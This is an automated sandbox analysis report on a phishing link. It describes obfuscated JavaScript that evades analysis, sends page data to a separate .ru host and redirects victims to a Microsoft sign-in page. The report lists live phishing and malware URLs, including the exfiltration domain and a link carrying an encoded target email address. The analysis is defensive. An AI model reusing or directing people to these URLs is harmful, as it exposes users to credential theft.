Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpbm5vY2FwLmNvbQ==

Overview

General Information

Sample URL:https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpbm5vY2FwLmNvbQ==
Analysis ID:1592410
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected suspicious Javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 3156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2028,i,18349187125816004282,11798271586635004121,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpbm5vY2FwLmNvbQ==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpbm5vY2FwLmNvbQ==Avira URL Cloud: detection malicious, Label: phishing
Source: https://guf1.xemirax.ru/favicon.icoAvira URL Cloud: Label: phishing
Source: https://guf1.xemirax.ru/6XAVE/Avira URL Cloud: Label: phishing
Source: https://dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru/478252250458126598869NAvKmLJHHIDCBIGVWTZZDXTZQNQJWSQOLATPKBEJADGSYPAIIHZIFXUZZGMEARMAvira URL Cloud: Label: malware

Phishing

barindex
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpb... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While the script may have some legitimate functionality, the overall risk level is high due to the presence of these malicious indicators.
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpb... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious login page. These behaviors are highly indicative of malicious intent, such as attempting to bypass security measures and potentially steal user credentials.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpb... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious domain interactions. It uses the `turnstile.render()` function to render a form, and then the `MXZqJSFGby()` function handles the form submission. This function collects user data, including the page link, and sends it to an untrusted domain (`dBePc3RSodj1oPBH9d5MeKHhkvVbkxAvf1QL6lCV9B7jLdnqXTdYKT.ivertoneym.ru`). Additionally, the script attempts to redirect the user to a Microsoft login page, which is likely part of a phishing attempt. Overall, the script exhibits clear signs of malicious intent and should be considered a high-risk security threat.
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 6301c31f-c4bd-4259-aad6-e9ee1b40faddc90d5ce0-6d46-47ff-9d0e-4e3f6bb63c29
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpbm5vY2FwLmNvbQ==HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.144
Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.144
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /6XAVE/ HTTP/1.1Host: guf1.xemirax.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://guf1.xemirax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://guf1.xemirax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://guf1.xemirax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://guf1.xemirax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
